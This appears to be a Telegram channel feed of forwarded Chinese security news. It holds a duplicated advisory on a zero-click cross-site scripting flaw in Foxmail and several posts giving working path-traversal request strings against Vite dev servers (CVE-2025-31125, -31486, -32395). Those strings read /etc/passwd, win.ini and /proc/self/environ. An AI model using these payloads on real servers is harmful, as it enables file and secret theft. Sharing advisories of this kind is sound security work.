Forwarded from LoopDNS资讯播报
漏洞:Foxmail邮件客户端存在跨站脚本攻击漏洞
漏洞编号:CNTA-2025-0007
重要等级:中等
影响范围:< 7.2.25 [Windows]
漏洞类型:跨站脚本
漏洞概述:该漏洞由于 Foxmail 在加载邮件正文中的 HTML 内容时,对危险内容的过滤处理逻辑存在缺陷。攻击者可利用该漏洞构造包含恶意指令代码的电子邮件,受害者在使用Foxmail打开浏览电子邮件时,无需额外点击,恶意指令代码即被用户主机加载并执行。
风险描述:
1. 攻击者以用户身份即可获取权限。
2. 攻击者无需以用户进行额外点击操作,受害者只需使用 Foxmail 打开或预览带有恶意脚本的邮件,恶意代码即可在后台加载并执行。
3. 受害者设备上,无论是否点击链接、加载图像或执行附件文件,只要客户端自动处理或显示邮件内容,即可能被利用
处置建议: Foxmail 官方已发布修复版本,建议用户务必及时更新至最新版本。如无法立刻升级,可先暂停使用受影响的 Foxmail 客户端版本,或临时改用网页版或其他平台的安全邮件客户端,以确保邮件收发的安全性和稳定性。
补充:该漏洞利用方式简单且具备规模化利用的条件,目前已存在关于该漏洞的在野利用行为
参考信息:国家计算机网络应急技术处理协调中心
漏洞编号:CNTA-2025-0007
重要等级:中等
影响范围:< 7.2.25 [Windows]
漏洞类型:跨站脚本
漏洞概述:该漏洞由于 Foxmail 在加载邮件正文中的 HTML 内容时,对危险内容的过滤处理逻辑存在缺陷。攻击者可利用该漏洞构造包含恶意指令代码的电子邮件,受害者在使用Foxmail打开浏览电子邮件时,无需额外点击,恶意指令代码即被用户主机加载并执行。
风险描述:
1. 攻击者以用户身份即可获取权限。
2. 攻击者无需以用户进行额外点击操作,受害者只需使用 Foxmail 打开或预览带有恶意脚本的邮件,恶意代码即可在后台加载并执行。
3. 受害者设备上,无论是否点击链接、加载图像或执行附件文件,只要客户端自动处理或显示邮件内容,即可能被利用
处置建议: Foxmail 官方已发布修复版本,建议用户务必及时更新至最新版本。如无法立刻升级,可先暂停使用受影响的 Foxmail 客户端版本,或临时改用网页版或其他平台的安全邮件客户端,以确保邮件收发的安全性和稳定性。
补充:该漏洞利用方式简单且具备规模化利用的条件,目前已存在关于该漏洞的在野利用行为
参考信息:国家计算机网络应急技术处理协调中心
🌚2❤1👍1
Forwarded from Eternal_安全内参
/@fs/etc/passwd?import&?inline=1.wasm?init
/@fs/C://windows/win.ini?import&?inline=1.wasm?init
Forwarded from Puddin在TG上看到了啥
Eternal_安全内参
/@fs/etc/passwd?import&?inline=1.wasm?init /@fs/C://windows/win.ini?import&?inline=1.wasm?init
vite还在发力
CVE-2025-31125(CVE-2025-30208的Bypass)
CVE-2025-31125(CVE-2025-30208的Bypass)
Forwarded from Puddin在TG上看到了啥
Puddin在TG上看到了啥
vite还在发力 CVE-2025-31125(CVE-2025-30208的Bypass)
vite还在在发力
CVE-2025-31486
/@fs/etc/passwd?.noscript?.wasm?init
CVE-2025-31486
Forwarded from Puddin在TG上看到了啥
Puddin在TG上看到了啥
vite还在在发力 /@fs/etc/passwd?.noscript?.wasm?init CVE-2025-31486
vite还在在在发力
CVE-2025-32395
需要猜vite项目所在地址,可以从403的返回界面看到(
/@fs/app#/../proc/self/environ
CVE-2025-32395
需要猜vite项目所在地址,可以从403的返回界面看到(